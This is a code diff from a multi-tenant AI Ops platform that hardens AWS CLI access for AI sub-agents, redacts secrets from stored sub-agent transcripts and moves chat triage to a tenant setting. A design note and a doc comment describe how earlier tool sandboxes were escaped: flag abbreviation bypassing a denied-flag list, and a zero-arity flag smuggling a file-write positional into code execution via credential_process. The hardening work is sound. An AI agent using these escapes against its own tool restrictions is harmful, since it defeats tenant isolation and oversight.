+ * WITH them it would silently fall back to the ECS TASK ROLE — the platform's own
+ * identity, which is outside every tenant's scoping and every audit trail that keys
+ * off the assumed-role session. A sub-agent's aws_read reaches AWS through this same
+ * environment and has no human gate behind it, so "no profile" must mean "no
+ * credentials", never "the platform's credentials".
+ *
+ * AWS_CONFIG_FILE is likewise NOT inherited: an ambient ~/.aws/config can enable
+ * `cli_follow_urlparam` (making http:// parameter values fetch a URL),
+ * `credential_process` (an arbitrary command run during profile resolution) and
+ * `sso_*`. It is pinned per tenant below instead.
  */
 export function buildCommandEnv(tenantId?: string): Record<string, string> {
     const ALLOWED_KEYS = [
         'PATH', 'HOME', 'LANG', 'LC_ALL', 'LC_CTYPE', 'TZ', 'TERM', 'SHELL', 'USER', 'LOGNAME', 'TMPDIR',
         'AWS_REGION', 'AWS_DEFAULT_REGION', 'AWS_PROFILE', 'AWS_DEFAULT_PROFILE',
-        'AWS_CONFIG_FILE', 'AWS_SHARED_CREDENTIALS_FILE', 'AWS_STS_REGIONAL_ENDPOINTS', 'AWS_CA_BUNDLE',
+        'AWS_SHARED_CREDENTIALS_FILE', 'AWS_STS_REGIONAL_ENDPOINTS', 'AWS_CA_BUNDLE',
     ];
     const childEnv: Record<string, string> = {};
     for (const key of ALLOWED_KEYS) {
@@ -74,8 +91,12 @@ export function buildCommandEnv(tenantId?: string): Record<string, string> {
     }
     // Point the AWS CLI/SDK at this tenant's isolated credentials file so profiles
     // created by get_aws_credentials resolve — without exposing other tenants' files.
+    // The config path is pinned to the same tenant directory so CLI configuration is
+    // ours (and, in practice, absent) rather than whatever the container image or a
+    // written-to home directory happens to carry.
     if (tenantId) {
         childEnv.AWS_SHARED_CREDENTIALS_FILE = getTenantCredentialsFilePath(tenantId);
+        childEnv.AWS_CONFIG_FILE = getTenantConfigFilePath(tenantId);
     }
     return childEnv;
 }

--- a/apps/web-ui/lib/agent/tools.ts
+++ b/apps/web-ui/lib/agent/tools.ts
@@ -10,6 +10,7 @@ import { Readable } from 'stream';
 import { env } from '@/env';
 import { getTenantCredentialsFilePath } from './session-manager';
 import { AuditService } from '@/lib/audit-service';
+import { Semaphore } from './concurrency';
 
 // Re-export AWS credentials tool factories
 export { createGetAwsCredentialsTool, createListAwsAccountsTool } from './aws-credentials-tool';
@@ -81,6 +82,14 @@ function buildCommandEnv(tenantId?: string): Record<string, string> {
 
 // Helper to truncate large tool outputs to prevent prompt token limits
 const MAX_OUTPUT_LENGTH = 100000;
+/**
+ * Caps concurrent shell subprocesses across the whole process. Other tools
+ * (AWS SDK, Prisma, MCP) are network/DB calls that are already pooled by their
+ * own clients, so only execute_command needs an explicit bound.
+ */
+const TOOL_CONCURRENCY = Number(process.env.TOOL_CONCURRENCY) || 6;
+const commandSemaphore = new Semaphore(TOOL_CONCURRENCY);
+
 const truncateToolOutput = (output: string) => {
     if (output && output.length > MAX_OUTPUT_LENGTH) {
         return output.substring(0, MAX_OUTPUT_LENGTH) + `\n\n...[Output truncated due to length. Total length: ${output.length} characters]...`;
@@ -128,12 +137,12 @@ export const executeCommandTool = tool(
         };
 
         try {
-            const { stdout, stderr } = await execAsync(command, {
+            const { stdout, stderr } = await commandSemaphore.run(() => execAsync(command, {
                 shell: '/bin/bash',
                 timeout: 120000, // 2 minute timeout for long-running AWS CLI commands
                 maxBuffer: 1024 * 1024 * 10, // 10MB buffer
                 env: buildCommandEnv(tenantId) as NodeJS.ProcessEnv,
-            });
+            }));
 
             const output = stdout || stderr || 'Command executed successfully (no output)';
             console.log(`[Tool] Command Output Length: ${output.length}`);

--- a/apps/web-ui/lib/agent/triage.test.ts
+++ b/apps/web-ui/lib/agent/triage.test.ts
@@ -6,6 +6,10 @@ vi.mock('@/lib/skill-service', () => ({
 }));
 vi.mock('./model-factory', () => ({ createAgentModels: vi.fn() }));
 vi.mock('./auto-skill-select', () => ({ autoSelectSkill: vi.fn() }));
+// triageChatMessage resolves the tenant's AI Ops feature settings fresh on every
+// call; stub the store so tests control the chat-triage toggle.
+vi.mock('@/lib/tenant-config-service', () => ({ TenantConfigService: { getConfig: vi.fn() } }));
+import { TenantConfigService } from '@/lib/tenant-config-service';
 
 import { getSkillSummaries, getSkillById } from '@/lib/skill-service';
 import { createAgentModels } from './model-factory';
@@ -21,13 +25,13 @@ beforeEach(() => {
     vi.mocked(getSkillSummaries).mockResolvedValue(CATALOG);
     vi.mocked(getSkillById).mockResolvedValue({ id: 'cost-analyser', name: 'Cost Analyser', description: 'analyses spend', tier: 'read-only' } as any);
 });
-afterEach(() => { delete process.env.CHAT_TRIAGE_ENABLED; });
+import { DEFAULT_FEATURES, primeAiopsFeaturesCache } from './aiops-features';
 
 describe('chatTriageEnabled', () => {
-    it('defaults true; false disables', () => {
+    it('defaults true; tenant setting false disables', () => {
         expect(chatTriageEnabled()).toBe(true);
-        process.env.CHAT_TRIAGE_ENABLED = 'false';
-        expect(chatTriageEnabled()).toBe(false);
+        primeAiopsFeaturesCache('t-triage-off', { ...DEFAULT_FEATURES, chatTriageEnabled: false });
+        expect(chatTriageEnabled('t-triage-off')).toBe(false);
     });
 });
 
@@ -97,7 +101,7 @@ describe('triageChatMessage', () => {
     });
 
     it('kill-switch: falls back to legacy autoSelectSkill with route task', async () => {
-        process.env.CHAT_TRIAGE_ENABLED = 'false';
+        vi.mocked(TenantConfigService.getConfig).mockResolvedValue({ chatTriageEnabled: false } as never);
         vi.mocked(autoSelectSkill).mockResolvedValue({ slug: 'cost-analyser', reasoning: 'legacy' });
         const res = await triageChatMessage(base);
         expect(res).toEqual({ route: 'task', skillId: 'cost-analyser', reasoning: 'legacy' });
@@ -105,7 +109,7 @@ describe('triageChatMessage', () => {
     });
 
     it('kill-switch + preselected skill: pure task fallback, no LLM calls', async () => {
-        process.env.CHAT_TRIAGE_ENABLED = 'false';
+        vi.mocked(TenantConfigService.getConfig).mockResolvedValue({ chatTriageEnabled: false } as never);
         const res = await triageChatMessage({ ...base, skillAlreadySelected: true });
         expect(res.route).toBe('task');
         expect(vi.mocked(autoSelectSkill)).not.toHaveBeenCalled();

--- a/apps/web-ui/lib/agent/triage.ts
+++ b/apps/web-ui/lib/agent/triage.ts
@@ -13,8 +13,9 @@
  *
  * Fail-open: any error, parse failure, or disabled flag routes to 'task'
  * (a wasted planner pass is cheaper than a wrong "I can't do that" reply).
- * Kill-switch: CHAT_TRIAGE_ENABLED=false reverts routing to always-'task'
- * while keeping skill auto-selection (via the legacy autoSelectSkill path).
+ * Tenant toggle (AI Ops console settings → 'Smart routing'): off reverts
+ * routing to always-'task' while keeping skill auto-selection (via the legacy
+ * autoSelectSkill path). No environment variable involved.
  */
 
 import { SystemMessage, HumanMessage } from '@langchain/core/messages';
@@ -22,10 +23,11 @@ import { contentToText, type ResolvedModelConfig } from './agent-shared';
 import { createAgentModels } from './model-factory';
 import { getSkillSummaries, getSkillById } from '@/lib/skill-service';
 import { autoSelectSkill } from './auto-skill-select';
+import { getAiopsFeatures, resolveAiopsFeatures } from './aiops-features';
 
-export function chatTriageEnabled(): boolean {
-    const v = process.env.CHAT_TRIAGE_ENABLED?.toLowerCase();
-    return !(v === 'false' || v === '0');
+export function chatTriageEnabled(tenantId?: string): boolean {
+    // Tenant setting (AI Ops console → settings), default on. No env dependency.
+    return getAiopsFeatures(tenantId).chatTriageEnabled;
 }
 
 export interface TriageResult {
@@ -64,9 +66,11 @@ export async function triageChatMessage(params: {
     /** True when the user manually pinned a skill — skill matching is skipped. */
     skillAlreadySelected?: boolean;
 }): Promise<TriageResult> {
-    // Kill-switch: preserve pre-triage behavior exactly (always workflow,
-    // legacy standalone skill auto-selection).
-    if (!chatTriageEnabled()) {
+    // Tenant toggle: preserve pre-triage behavior exactly (always workflow,
+    // legacy standalone skill auto-selection). Resolved fresh — this runs once
+    // per message and must honor a just-saved settings change.
+    const features = await resolveAiopsFeatures(params.tenantId).catch(() => getAiopsFeatures(params.tenantId));
+    if (!features.chatTriageEnabled) {
         if (params.skillAlreadySelected) return TASK_FALLBACK;
         const auto = await autoSelectSkill({ tenantId: params.tenantId, message: params.message, model: params.model });
         return { route: 'task', skillId: auto?.slug ?? null, reasoning: auto?.reasoning ?? 'triage disabled' };
@@ -80,7 +84,7 @@ export async function triageChatMessage(params: {
                 .catch(() => null);
 
         const skillInstruction = catalog
-            ? `\n${catalog}\n\nFor "task" routes, also pick the single most relevant skill from the catalog above — or null when none clearly matches its description. For "direct" routes, skillId is always null.`
+            ? `\n${catalog}\n\nFor "task" routes, also pick the single BEST-MATCHING skill from the catalog above. Selecting a skill is the DEFAULT: match on the task's domain (cost, EC2, Jira, security, …), not on exact wording. Return null ONLY when nothing in the catalog is even loosely related to the request. For "direct" routes, skillId is always null.`
             : `\nskillId is always null.`;
 
         const sys = new SystemMessage(

--- a/apps/web-ui/lib/db/pg-config.ts
+++ b/apps/web-ui/lib/db/pg-config.ts
@@ -77,6 +77,7 @@ export const TENANT_SCOPED_MODELS = new Set([
     'CertificateDeployment',
     'CertificateExecution',
     'ChatMessage',
+    'AgentSubagentRun',
     'CustomRole',
     'UserTenantRole',
     'TenantConfig',

--- a/apps/web-ui/lib/db/repositories/subagent/interface.ts
+++ b/apps/web-ui/lib/db/repositories/subagent/interface.ts
@@ -1,0 +1,36 @@
+/**
+ * Sub-agent run persistence — one row per dispatch_agent sub-agent, so a collapsed
+ * card in the chat run rail can still be expanded after a page reload.
+ *
+ * The transcript deliberately lives here and NEVER in the dispatch_agent ToolMessage:
+ * that message enters the orchestrator's context and would defeat the very isolation
+ * sub-agents exist to provide.
+ */
+
+export interface SubagentTranscriptEntry {
+    kind: 'ai' | 'tool';
+    name?: string;
+    text: string;
+}
+
+export interface SubagentRunRecord {
+    tenantId: string;
+    threadId: string;
+    subagentId: string;
+    role: string;
+    task: string;
+    status: string;
+    toolCount: number;
+    tokensIn: number;
+    tokensOut: number;
+    summary?: string | null;
+    transcript?: SubagentTranscriptEntry[] | null;
+}
+
+export interface SubagentRunRepository {
+    /** Upsert by (tenantId, threadId, subagentId) — a sub-agent is written once
+     *  on completion, but a retried write must not create a duplicate row.
+     *  Implementations MUST redact secrets before persisting. */
+    save(record: SubagentRunRecord): Promise<void>;
+    listByThread(tenantId: string, threadId: string): Promise<SubagentRunRecord[]>;
+}

--- a/apps/web-ui/lib/db/repositories/subagent/postgres.test.ts
+++ b/apps/web-ui/lib/db/repositories/subagent/postgres.test.ts
@@ -1,0 +1,131 @@
+/**
+ * The redaction guarantee is asserted HERE, at the repository, because that is where
+ * it is enforced — every present and future caller of save() is covered and none can
+ * forget. These tests inspect the argument actually handed to Prisma's upsert rather
+ * than asserting the redactor was called, so deleting the redactTranscript(...) wrapper
+ * in postgres.ts fails them.
+ */
+import { describe, it, expect, vi, beforeEach } from 'vitest';
+
+const upsert = vi.fn();
+const findMany = vi.fn();
+const getTenantClient = vi.fn(() => ({ agentSubagentRun: { upsert, findMany } }));
+
+vi.mock('@/lib/db/pg-config', () => ({ getTenantClient: (...args: unknown[]) => getTenantClient(...(args as [])) }));
+
+import { SubagentRunPostgresRepository } from './postgres';
+import { REDACTED } from '@/lib/agent/subagent-redact';
+import type { SubagentRunRecord } from './interface';
+
+const repo = new SubagentRunPostgresRepository();
+
+const LAMBDA_CONFIG = JSON.stringify({
+    FunctionName: 'api-worker',
+    Environment: { Variables: { DB_PASSWORD: 'hunter2' } },
+});
+
+const record = (overrides: Partial<SubagentRunRecord> = {}): SubagentRunRecord => ({
+    tenantId: 't1',
+    threadId: 'thread-1',
+    subagentId: 'sub-1',
+    role: 'Cost auditor',
+    task: 'Audit lambda config',
+    status: 'done',
+    toolCount: 2,
+    tokensIn: 100,
+    tokensOut: 50,
+    summary: 'Nothing unusual.',
+    transcript: [{ kind: 'tool', name: 'aws_read', text: LAMBDA_CONFIG }],
+    ...overrides,
+});
+
+beforeEach(() => {
+    vi.clearAllMocks();
+    upsert.mockResolvedValue({});
+    findMany.mockResolvedValue([]);
+});
+
+describe('SubagentRunPostgresRepository.save', () => {
+    it('redacts Environment.Variables out of the persisted transcript', async () => {
+        await repo.save(record());
+
+        const args = upsert.mock.calls[0][0];
+        for (const payload of [args.create, args.update]) {
+            expect(JSON.stringify(payload.transcript)).toContain(REDACTED);
+            expect(JSON.stringify(payload.transcript)).not.toContain('hunter2');
+        }
+        // Nothing anywhere in the write may carry the plaintext.
+        expect(JSON.stringify(args)).not.toContain('hunter2');
+    });
+
+    it('redacts the LLM-authored summary too — it is shown even when the transcript is empty', async () => {
+        await repo.save(record({
+            transcript: [],
+            summary: 'The function is misconfigured; DB_PASSWORD=hunter2 is set in plaintext.',
+        }));
+
+        const args = upsert.mock.calls[0][0];
+        expect(args.create.summary).toContain(REDACTED);
+        expect(JSON.stringify(args)).not.toContain('hunter2');
+    });
+
+    it('upserts on (tenantId, threadId, subagentId) so a retried write cannot duplicate', async () => {
+        await repo.save(record());
+
+        const args = upsert.mock.calls[0][0];
+        expect(args.where.tenantId_threadId_subagentId).toEqual({
+            tenantId: 't1', threadId: 'thread-1', subagentId: 'sub-1',
+        });
+        expect(getTenantClient).toHaveBeenCalledWith('t1');
+    });
+
+    it('preserves non-secret fields and sets a 30-day TTL', async () => {
+        const before = Date.now();
+        await repo.save(record({ transcript: [{ kind: 'ai', text: 'Checked 3 accounts.' }] }));
+
+        const { create } = upsert.mock.calls[0][0];
+        expect(create.role).toBe('Cost auditor');
+        expect(create.toolCount).toBe(2);
+        expect(create.tokensIn).toBe(100);
+        expect(create.transcript[0].text).toBe('Checked 3 accounts.');
+        expect(create.expiresAt.getTime()).toBeGreaterThanOrEqual(before + 29 * 24 * 60 * 60 * 1000);
+    });
+
+    it('writes null rather than undefined for an absent transcript', async () => {
+        await repo.save(record({ transcript: null, summary: null }));
+
+        const { create } = upsert.mock.calls[0][0];
+        expect(create.transcript).toBeNull();
+        expect(create.summary).toBeNull();
+    });
+});
+
+describe('SubagentRunPostgresRepository.listByThread', () => {
+    it('reads through the tenant-scoped client', async () => {
+        findMany.mockResolvedValue([{
+            tenantId: 't1', threadId: 'thread-1', subagentId: 'sub-1',
+            role: 'R', task: 'T', status: 'done', toolCount: 1, tokensIn: 2, tokensOut: 3,
+            summary: 's', transcript: [{ kind: 'ai', text: 'x' }],
+        }]);
+
+        const rows = await repo.listByThread('t1', 'thread-1');
+
+        expect(getTenantClient).toHaveBeenCalledWith('t1');
+        expect(findMany).toHaveBeenCalledWith({
+            where: { threadId: 'thread-1' },
+            orderBy: { createdAt: 'asc' },
+        });
+        expect(rows).toHaveLength(1);
+        expect(rows[0].transcript).toEqual([{ kind: 'ai', text: 'x' }]);
+    });
+
+    it('maps a null transcript to null', async () => {
+        findMany.mockResolvedValue([{
+            tenantId: 't1', threadId: 'thread-1', subagentId: 'sub-1',
+            role: 'R', task: 'T', status: 'failed', toolCount: 0, tokensIn: 0, tokensOut: 0,
+            summary: null, transcript: null,
+        }]);
+
+        expect((await repo.listByThread('t1', 'thread-1'))[0].transcript).toBeNull();
+    });
+});

--- a/apps/web-ui/lib/db/repositories/subagent/postgres.ts
+++ b/apps/web-ui/lib/db/repositories/subagent/postgres.ts
@@ -1,0 +1,75 @@
+/**
+ * SubagentRunPostgresRepository
+ *
+ * PostgreSQL implementation of SubagentRunRepository using Prisma ORM.
+ * Reads/writes the `agent_subagent_runs` table (defined in libs/prisma/schema.prisma).
+ *
+ * AgentSubagentRun is listed in TENANT_SCOPED_MODELS, so getTenantClient() injects
+ * tenantId into every read and write here — a caller cannot reach another tenant's
+ * transcript by supplying its threadId.
+ */
+import { getTenantClient } from '@/lib/db/pg-config';
+import { redactTranscript } from '@/lib/agent/subagent-redact';
+import type { SubagentRunRecord, SubagentRunRepository, SubagentTranscriptEntry } from './interface';
+
+const TTL_30_DAYS_MS = 30 * 24 * 60 * 60 * 1000;
+
+export class SubagentRunPostgresRepository implements SubagentRunRepository {
+    async save(record: SubagentRunRecord): Promise<void> {
+        const db = getTenantClient(record.tenantId);
+        const data = {
+            tenantId: record.tenantId,
+            threadId: record.threadId,
+            subagentId: record.subagentId,
+            role: record.role,
+            task: record.task,
+            status: record.status,
+            toolCount: record.toolCount,
+            tokensIn: record.tokensIn,
+            tokensOut: record.tokensOut,
+            // Redacted HERE rather than at the call site so no caller can bypass it.
+            // aws_read permits `lambda get-function-configuration`, which returns
+            // Environment.Variables in plaintext; those must never reach at-rest storage.
+            // The summary is redacted too: it is LLM-authored prose that can quote a
+            // secret the sub-agent saw, and it is the one field still shown after a
+            // reload when the transcript is empty.
+            summary: redactTranscript(record.summary ?? null),
+            transcript: redactTranscript(record.transcript ?? null) as never,
+            expiresAt: new Date(Date.now() + TTL_30_DAYS_MS),
+        };
+
+        await db.agentSubagentRun.upsert({
+            where: {
+                tenantId_threadId_subagentId: {
+                    tenantId: record.tenantId,
+                    threadId: record.threadId,
+                    subagentId: record.subagentId,
+                },
+            },
+            create: data,
+            update: data,
+        });
+    }
+
+    async listByThread(tenantId: string, threadId: string): Promise<SubagentRunRecord[]> {
+        const db = getTenantClient(tenantId);
+        const rows = await db.agentSubagentRun.findMany({
+            where: { threadId },
+            orderBy: { createdAt: 'asc' },
+        });
+
+        return rows.map(row => ({
+            tenantId: row.tenantId,
+            threadId: row.threadId,
+            subagentId: row.subagentId,
+            role: row.role,
+            task: row.task,
+            status: row.status,
+            toolCount: row.toolCount,
+            tokensIn: row.tokensIn,
+            tokensOut: row.tokensOut,
+            summary: row.summary,
+            transcript: (row.transcript ?? null) as SubagentTranscriptEntry[] | null,
+        }));
+    }
+}

--- a/apps/web-ui/lib/db/repository-factory.ts
+++ b/apps/web-ui/lib/db/repository-factory.ts
@@ -30,6 +30,7 @@ import type { ISkillRepository } from './repositories/skill/interface';
 import type { ISlackWorkspaceLinkRepository } from './repositories/slack-workspace-link/interface';
 import type { IDashboardRepository } from './repositories/dashboard/interface';
 import type { ITelegramBotLinkRepository } from './repositories/telegram-bot-link/interface';
+import type { SubagentRunRepository } from './repositories/subagent/interface';
 
 export function getTenantConfigRepository(): ITenantConfigRepository {
     // eslint-disable-next-line @typescript-eslint/no-require-imports
@@ -149,6 +150,12 @@ export function getTelegramBotLinkRepository(): ITelegramBotLinkRepository {
     // eslint-disable-next-line @typescript-eslint/no-require-imports
     const { TelegramBotLinkPostgresRepository } = require('./repositories/telegram-bot-link/postgres');
     return new TelegramBotLinkPostgresRepository();
+}
+
+export function getSubagentRunRepository(): SubagentRunRepository {
+    // eslint-disable-next-line @typescript-eslint/no-require-imports
+    const { SubagentRunPostgresRepository } = require('./repositories/subagent/postgres');
+    return new SubagentRunPostgresRepository();
 }
 
 /**

--- a/apps/web-ui/lib/nav-config.ts
+++ b/apps/web-ui/lib/nav-config.ts
@@ -36,6 +36,8 @@ export const navMenus: NavItem[] = [
       { title: "Ask", href: "/app/knowledge-base/ask" },
       { title: "Skills", href: "/app/skills" },
       { title: "MCP Servers", href: "/app/agent-ops/mcp-settings" },
+      // Sub-agent settings deliberately have no nav entry: they open from the
+      // AI Ops console's header menu ("AI Ops settings"), where they are used.
       // LLM providers power the agents — grouped with Agentic Ops, not Settings.
       { title: "Providers", href: "/app/settings/providers" },
     ],

--- a/apps/web-ui/lib/queries/aiops-settings.ts
+++ b/apps/web-ui/lib/queries/aiops-settings.ts
@@ -17,11 +17,25 @@ export interface SubagentBudget {
 
 export interface SubagentBound { min: number; max: number; default: number }
 
+export interface AiopsFeatureConfig {
+    chatTriageEnabled: boolean;
+    workingMemoryEnabled: boolean;
+    episodicMemoryEnabled: boolean;
+    proceduralMemoryEnabled: boolean;
+    memoryReconcileEnabled: boolean;
+    autoSkillCreationEnabled: boolean;
+    autoSkillMaturityThreshold: number;
+    skillSynthesisMinRules: number;
+    maxIterations: number;
+}
+
 export interface AiopsSubagentSettings {
     budget: SubagentBudget;
     bounds: Record<keyof Omit<SubagentBudget, 'enabled'>, SubagentBound>;
     /** False when SUBAGENTS_ENABLED is off for the whole deployment. */
     platformEnabled: boolean;
+    features: AiopsFeatureConfig;
+    featureBounds: Record<'autoSkillMaturityThreshold' | 'skillSynthesisMinRules' | 'maxIterations', SubagentBound>;
 }
 
 export function useAiopsSubagentSettings() {
@@ -52,6 +66,25 @@ export function useSaveAiopsSubagentSettings() {
                 throw new Error(json.error || 'Failed to save AI Ops settings');
             }
             return json.data.budget as SubagentBudget;
+        },
+        onSuccess: () => qc.invalidateQueries({ queryKey: queryKeys.aiopsSettings.all }),
+    });
+}
+
+export function useSaveAiopsFeatureSettings() {
+    const qc = useQueryClient();
+    return useMutation({
+        mutationFn: async (features: AiopsFeatureConfig): Promise<AiopsFeatureConfig> => {
+            const res = await fetch('/api/settings/aiops', {
+                method: 'PUT',
+                headers: { 'Content-Type': 'application/json' },
+                body: JSON.stringify({ features }),
+            });
+            const json = await res.json().catch(() => ({}));
+            if (!res.ok || !json.success) {
+                throw new Error(json.error || 'Failed to save AI Ops settings');
+            }
+            return json.data.features as AiopsFeatureConfig;
         },
         onSuccess: () => qc.invalidateQueries({ queryKey: queryKeys.aiopsSettings.all }),
     });

--- a/apps/web-ui/lib/queries/aiops-settings.ts
+++ b/apps/web-ui/lib/queries/aiops-settings.ts
@@ -1,0 +1,58 @@
+'use client';
+
+/**
+ * TanStack Query hooks for the AI Ops sub-agent budget (per-tenant).
+ */
+import { useMutation, useQuery, useQueryClient } from '@tanstack/react-query';
+import { queryKeys } from './query-keys';
+
+export interface SubagentBudget {
+    enabled: boolean;
+    maxConcurrentSubagents: number;
+    maxSubagentsPerRun: number;
+    maxSubagentTokensPerRun: number;
+    subagentMaxIterations: number;
+    subagentTimeoutMs: number;
+}
+
+export interface SubagentBound { min: number; max: number; default: number }
+
+export interface AiopsSubagentSettings {
+    budget: SubagentBudget;
+    bounds: Record<keyof Omit<SubagentBudget, 'enabled'>, SubagentBound>;
+    /** False when SUBAGENTS_ENABLED is off for the whole deployment. */
+    platformEnabled: boolean;
+}
+
+export function useAiopsSubagentSettings() {
+    return useQuery({
+        queryKey: queryKeys.aiopsSettings.subagents(),
+        queryFn: async (): Promise<AiopsSubagentSettings> => {
+            const res = await fetch('/api/settings/aiops');
+            const json = await res.json().catch(() => ({}));
+            if (!res.ok || !json.success) {
+                throw new Error(json.error || 'Failed to load AI Ops settings');
+            }
+            return json.data as AiopsSubagentSettings;
+        },
+    });
+}
+
+export function useSaveAiopsSubagentSettings() {
+    const qc = useQueryClient();
+    return useMutation({
+        mutationFn: async (body: SubagentBudget): Promise<SubagentBudget> => {
+            const res = await fetch('/api/settings/aiops', {
+                method: 'PUT',
+                headers: { 'Content-Type': 'application/json' },
+                body: JSON.stringify(body),
+            });
+            const json = await res.json().catch(() => ({}));
+            if (!res.ok || !json.success) {
+                throw new Error(json.error || 'Failed to save AI Ops settings');
+            }
+            return json.data.budget as SubagentBudget;
+        },
+        onSuccess: () => qc.invalidateQueries({ queryKey: queryKeys.aiopsSettings.all }),
+    });
+}

--- a/apps/web-ui/lib/queries/query-keys.ts
+++ b/apps/web-ui/lib/queries/query-keys.ts
@@ -59,6 +59,10 @@ export const queryKeys = {
         content: (id: string, versionId?: string) =>
             [...queryKeys.certificates.detail(id), 'content', versionId ?? 'active'] as const,
     },
+    subagents: {
+        all: ['subagents'] as const,
+        byThread: (threadId: string) => [...queryKeys.subagents.all, 'thread', threadId] as const,
+    },
     kbChat: {
         all: ['kb-chat'] as const,
         sessions: () => [...queryKeys.kbChat.all, 'sessions'] as const,

--- a/apps/web-ui/lib/queries/query-keys.ts
+++ b/apps/web-ui/lib/queries/query-keys.ts
@@ -100,6 +100,10 @@ export const queryKeys = {
         all: ['threads'] as const,
         lists: () => [...queryKeys.threads.all, 'list'] as const,
     },
+    aiopsSettings: {
+        all: ['aiops-settings'] as const,
+        subagents: () => [...queryKeys.aiopsSettings.all, 'subagents'] as const,
+    },
     dashboard: {
         all: ['dashboard'] as const,
         hero: (range: string) => [...queryKeys.dashboard.all, 'hero', range] as const,

--- a/apps/web-ui/lib/queries/subagents.ts
+++ b/apps/web-ui/lib/queries/subagents.ts
@@ -1,0 +1,52 @@
+'use client';
+
+/**
+ * TanStack Query hook for persisted sub-agent runs.
+ *
+ * Stream data parts are not persisted — chat history is rebuilt from the LangGraph
+ * checkpointer — so live expansion works from client state but a reload loses it.
+ * A collapsed card fetches its transcript from `agent_subagent_runs` on demand.
+ *
+ * Keyed per thread, not per sub-agent: one response carries every sub-agent in the
+ * thread, so expanding a second card is served from cache.
+ */
+import { useQuery } from '@tanstack/react-query';
+import { queryKeys } from '@/lib/queries/query-keys';
+
+export interface PersistedSubagentTranscriptEntry {
+    kind: 'ai' | 'tool';
+    name?: string;
+    text: string;
+}
+
+export interface PersistedSubagentRun {
+    subagentId: string;
+    role: string;
+    task: string;
+    status: string;
+    toolCount: number;
+    tokensIn: number;
+    tokensOut: number;
+    summary?: string | null;
+    transcript?: PersistedSubagentTranscriptEntry[] | null;
+}
+
+/**
+ * @param threadId  thread whose sub-agent runs to load; the query stays idle without one
+ * @param enabled   pass the card's expanded state — keeps the default render free of
+ *                  network work
+ */
+export function useSubagentRuns(threadId: string | undefined, enabled: boolean) {
+    return useQuery({
+        queryKey: queryKeys.subagents.byThread(threadId ?? 'none'),
+        enabled: enabled && !!threadId,
+        queryFn: async (): Promise<PersistedSubagentRun[]> => {
+            const res = await fetch(`/api/chat/subagents/${encodeURIComponent(threadId!)}`);
+            const json = await res.json().catch(() => ({}));
+            if (!res.ok || !json.success) {
+                throw new Error(json.error || 'Failed to load sub-agent transcript');
+            }
+            return json.data as PersistedSubagentRun[];
+        },
+    });
+}

--- a/docs/superpowers/plans/2026-07-26-aiops-subagent-orchestration.md
+++ b/docs/superpowers/plans/2026-07-26-aiops-subagent-orchestration.md
@@ -2444,40 +2444,54 @@ export function filterReadOnlyTools<T extends { name: string }>(tools: T[]): T[]
 }
 ```
 
-- [ ] **Step 7: Add the structured `aws_read` tool**
+- [ ] **Step 7: Add the structured `aws_read` tool (allowlists on BOTH axes)**
 
 **Files:** create `apps/web-ui/lib/agent/aws-read-tool.ts`, create
-`apps/web-ui/lib/agent/aws-read-tool.test.ts`.
+`apps/web-ui/lib/agent/aws-read-tool.test.ts`, export `buildCommandEnv` from
+`apps/web-ui/lib/agent/tools.ts`.
 
-The whole point: there is **no command string**, so there is nothing to parse. The
-server builds `argv` and calls `execFile` with `shell: false`. Metacharacters, quoting,
-flag-order confusion, `VAR=value` prefixes, and `$(...)` cease to exist as a category —
-they are inert data in an argv element, never interpreted.
+> **Design history — read before changing anything here.** Three designs failed
+> adversarial review. (1) A blocklist over shell strings: escaped 23 ways. (2) An
+> allowlist that *parsed* shell strings: escaped to RCE. (3) This structured tool with
+> **denylists** for flags and operations: escaped to RCE again, because
+> `DENIED_FLAGS` was defeated by argparse abbreviation (`--endpoint` is accepted for
+> the denied `--endpoint-url`) and a zero-arity flag smuggled a positional into
+> `s3api get-object`'s outfile slot.
+>
+> The structural half — no shell, server-built argv, `execFile` with `shell: false`,
+> a fully replaced environment — held against every attack and is **not** what to
+> change. What failed, three times, is enumerating what is forbidden. Everything
+> below enumerates what is *permitted*, on every axis: service, operation, flag, and
+> flag arity.
 
 ```typescript
 /**
  * aws_read — the ONLY route from a sub-agent to AWS.
  *
  * Sub-agents have no shell (see subagent.ts's denylist). This tool takes a
- * structured request and builds argv itself, then runs `execFile` with
- * shell: false. Nothing the model supplies is ever interpreted by a shell, so the
- * escape classes that broke two previous designs — metacharacters, quoting,
- * flag-order confusion, LD_PRELOAD prefixes, command substitution — are not
- * merely blocked here, they are unrepresentable.
+ * structured request, builds argv itself, and runs execFile with shell: false, so
+ * metacharacters, quoting, command substitution and LD_PRELOAD-style env prefixes
+ * are unrepresentable rather than blocked.
  *
- * Three further restrictions close what a structured call could still reach:
- *  - no positional arguments, so `s3api get-object … OUTFILE` cannot write a file;
- *  - a denied-flag set, so --endpoint-url cannot exfiltrate and --cli-input-json
- *    cannot smuggle parameters past validation;
- *  - a denied-operation set, so credential-minting reads (sts get-session-token,
- *    ecr get-login-password) and mutating "get-" operations
- *    (redshift get-cluster-credentials --auto-create) are refused by name.
+ * ALLOWLISTS ONLY. An earlier revision used denylists and was escaped twice:
+ *  - argparse has allow_abbrev=True, so every denied flag had an accepted
+ *    abbreviation (--endpoint for --endpoint-url). A denylist over an abbreviating
+ *    parser is structurally unsound.
+ *  - a zero-arity flag ("--no-cli-pager": "/tmp/x") emitted `flag value`, and the
+ *    CLI read the value as a POSITIONAL — which for `s3api get-object` is the
+ *    outfile. That wrote an arbitrary local file, and a credential_process entry in
+ *    ~/.aws/config turned it into arbitrary code execution.
+ *
+ * Hence every flag declares its ARITY. A zero-arity flag never emits a value token,
+ * so no positional can be produced by construction — not by policy.
  */
 import { execFile } from 'child_process';
 import { promisify } from 'util';
 import { tool } from '@langchain/core/tools';
 import { z } from 'zod';
 import { buildCommandEnv } from './tools';
+import { Semaphore } from './concurrency';
+import { AuditService } from '@/lib/audit-service';
 
 const execFileAsync = promisify(execFile);
 
@@ -2485,86 +2499,210 @@ const AWS_READ_TIMEOUT_MS = 120_000;
 const AWS_READ_MAX_BUFFER = 10 * 1024 * 1024;
 export const AWS_READ_OUTPUT_MAX_CHARS = 100_000;
 
-/** Read-only operation prefixes, by AWS CLI convention. */
-const READ_OPERATION_PREFIX = /^(describe|list|get|head|search|lookup|check|batch-get)-/;
+/**
+ * Bounds concurrent `aws` subprocesses. execute_command already has this bound
+ * (TOOL_CONCURRENCY) precisely because subprocesses need one; N sub-agents each
+ * issuing a parallel turn would otherwise fan out unbounded ~100MB processes in
+ * the ECS task.
+ */
+const AWS_READ_CONCURRENCY = Number(process.env.TOOL_CONCURRENCY) || 6;
